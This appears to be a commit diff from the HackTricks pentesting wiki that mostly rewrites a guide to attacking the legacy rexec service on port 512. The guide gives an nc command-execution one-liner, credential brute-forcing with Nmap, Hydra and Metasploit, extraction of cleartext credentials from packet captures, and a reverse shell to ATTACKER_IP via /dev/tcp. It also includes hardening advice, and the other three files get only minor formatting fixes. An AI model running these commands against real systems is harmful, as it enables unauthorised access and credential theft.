maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/network-services-pentesting/51...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-15 01:44:52 +00:00
parent cec78bcdf8
commit afa72557d9
4 changed files with 102 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
View File

@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
* NexMon Magisk ZIP or self-compiled patch providing:
* `/system/lib*/libnexmon.so`
* `/system/xbin/nexutil`
* Hijacker ≥ 1.7 (arm/arm64) https://github.com/chrisk44/Hijacker
* Hijacker ≥ 1.7 (arm/arm64) [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
* (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
---
@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
* [NexMon firmware patching framework](https://github.com/seemoo-lab/nexmon)
* [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

2
src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
View File

@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
### Automated dynamic analysis with MobSF (no jailbreak)
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest

105
src/network-services-pentesting/512-pentesting-rexec.md
View File

@ -2,22 +2,113 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
**Default Port:** 512
**Default Port:** TCP 512 (`exec`)
```
PORT STATE SERVICE
512/tcp open exec
```
### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
> 🔥 All traffic including credentials is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command.
### Protocol quick-look
1. Client connects to TCP 512.
2. Client sends three **NUL-terminated** strings:
* the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
* the **username**,
* the **password**.
3. A final NUL-terminated string with the **command** to execute is sent.
4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
If the credentials are valid you will receive the output of `id` straight back on the same connection.
### Manual usage with the client
Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
```bash
rexec -l user -p password <target> "uname -a"
```
If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
---
## Enumeration & Brute-forcing
### Nmap
```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
The `rexec-brute` NSE uses the protocol described above to try credentials very quickly .
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
The module will spawn a shell on success and store the credentials in the database .
---
## Sniffing credentials
Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
```
(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.)
---
## Post-Exploitation tips
* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the users shell and executes the command via `/bin/sh -c <cmd>`. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
---
## Hardening / Detection
* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin`, `rsh` together they share most of the same codebase and weaknesses.
---
## References
* Nmap NSE `rexec-brute` documentation [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}}

2
src/network-services-pentesting/pentesting-telnet.md
View File

@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}